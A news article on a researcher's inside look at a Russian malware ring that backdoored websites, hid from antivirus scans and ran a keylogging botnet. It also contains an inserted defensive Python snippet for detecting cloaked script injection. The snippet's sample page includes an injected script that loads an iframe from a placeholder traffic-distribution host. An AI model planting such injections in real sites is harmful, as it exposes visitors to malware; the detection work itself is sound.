
Inside a Russian malware scheme that hijacked 500,000 computers



The group stayed under the radar and ahead of antivirus scans


At its peak, the malware ring had control of half a million computers, using keystroke logging to harvest banking passwords and then putting the computers to work in a botnet. By growing slowly and staying one step ahead of anti-virus software, the group was able to go undetected for years — until a lapse in its own security allowed a Proofpoint security researcher named Wayne Huang to get a look at the organization from the inside.

Huang released a report on his findings this morning, providing a rare look at the full anatomy of a malware operation, from the first security break to the fraud tactics that provide them a payoff. It's not a particularly novel or sophisticated scheme — by botnet standards, half a million is the lower end of the big leagues — but it provides a new window into the intricate tactics these groups use to stay hidden. And for anyone who's seen strange behavior from a website or console, it's a reminder that real infections are often harder to find than you think. "They rarely do mass injections. They don't do huge campaigns, so they're not on people's radar," Huang says. "But once they're in, they build a really powerful backdoor."

[Figure: Proofpoint attack chain. The attack chain, as described by Huang.]

The scammers' first step was buying passwords on the dark web, paying for data from an earlier breach. That gave them a foothold in the first batch of sites, where the group could install its custom shell, giving them superadmin access to anything on the site, while allowing the site's owners to update the site as usual. When the system worked, the site owners never knew the difference. They still had admin access, and there was no obvious sign that another more powerful admin had been added. While the site owners kept posting as usual, the attackers would use the new backdoor to infect the site’s readers, injecting bursts of malware into the site’s code. From there the attackers would monitor keystrokes for bank login information, to be used in outright fraud, and sell access to their network of hijacked computers for anyone who wanted to disguise their web traffic by routing through a stranger’s internet connection.

The group was always one step ahead of antivirus updates

Most of the infected sites were running regular antivirus scans, but the attackers were careful only to use exploits that wouldn't set off any alarms. Before they uploaded any code, they would check it against the Scan4U database, which collects data from dozens of antivirus companies. If the database recognized the group's exploit, they would change the code until it slipped past unnoticed, ensuring they were always one step ahead of antivirus updates.

They also took measures to throw researchers like Huang off the trail. If a site visitor looked like an automated malware scanner, a traffic distribution system would isolate the visitor and route them to a clean version of the site, suggesting nothing was amiss. The system also kept a list of IP addresses used by security-research firms, and made sure any traffic from those addresses also went to the clean site. As a result, many site owners confronted by Huang refused to believe they were infected at all. The antivirus scan would come back empty, and most independent researchers would see a completely clean site.
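The cloaking described above has a simple defensive check: fetch the same URL as a scanner would and as an ordinary browser would, then compare the scripts each response carries. The comparison below is an added example, not code from the Proofpoint report or from Huang; it works on two HTML documents you have already fetched (the constructed CLEAN and INJECTED pages stand in for those), and the fetching itself is left to the caller.

```python
"""Compare the scripts served to a scanner-like visitor with those served
to a browser-like visitor. Added example; the sample HTML is constructed."""
import hashlib
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Record external script URLs and a hash of every inline script body."""

    def __init__(self):
        super().__init__()
        self.scripts = set()
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.add("src:" + src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            body = "".join(self._buf).strip().encode()
            self.scripts.add("inline:" + hashlib.sha256(body).hexdigest()[:16])
            self._in_inline = False


def script_fingerprint(html: str) -> set:
    """Set of script identifiers (URL or body hash) present in one response."""
    parser = _ScriptCollector()
    parser.feed(html)
    return parser.scripts


def cloaking_delta(scanner_view: str, browser_view: str) -> set:
    """Scripts only the browser-like visitor receives: a cloaking signal."""
    return script_fingerprint(browser_view) - script_fingerprint(scanner_view)


# Constructed sample: the scanner gets the clean page, the browser gets an
# extra inline script that pulls in a redirect (hostname is a placeholder).
CLEAN = "<html><head><script src='/js/site.js'></script></head><body>hi</body></html>"
INJECTED = CLEAN.replace(
    "</body>",
    "<script>document.write('<iframe src=\"http://tds.example/go\">')</script></body>",
)
```

A non-empty result for a site whose owner has not changed it is the point at which the "clean" scan result should no longer be trusted.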

But while the hackers' security protections were good, they weren't perfect. Huang's breakthrough came when he found the web address for the attackers' control panel. They hadn't thought to password-protect the controls, so once Huang located it, he got an inside view of everything the group was doing, including the countermeasures they'd used to throw other researchers off the trail. Eventually, the group added a password to keep Huang out, but by then it was too late.

[Figure: Proofpoint control panel. A screenshot of the attackers' control panel.]

Once the attackers began targeting individual users, they relied heavily on pre-purchased exploit kits, starting with the popular Blackhole kit and moving on to more recent kits like Sweet Orange and Phoenix. They used an array of vulnerabilities — targeting PDF plugins, Java, Flash and Internet Explorer depending on a user’s unique vulnerabilities — but the group left almost all of that work to others, buying exploits as they became available and abandoning them as patches became more common.


Still, even with all of Huang's detail on the group, it's unlikely they'll be brought to justice any time soon. There’s still plenty of work left to do in tracing the network back to individual people, and it’s unclear who’ll want to step in and do it. Taking down a botnet is a notoriously long and drawn-out process, and while Russian law enforcement has made some major busts in recent years, it may not be impressed by an outfit this size. The most Huang can hope for is a little more cred the next time he tells a site that he's found an infection. "We get a lot of upset website admins who believe we’ve falsely accused them of an infection," Huang says. "So we’re certainly hoping that those people will read this report."

More broadly, it’s a sign of how far web security still has to go. Researchers pay a lot of attention to breaches like Heartbleed, which give attackers an initial foothold, and vulnerabilities in popular software, which let them exploit individual users. But lingering infections like this one are often overlooked. As a result, once an attacker builds a backdoor into a server or a site, it can take years for the proper owners to regain control. For the half a million computers detailed in the report, that’s a troubling thought.
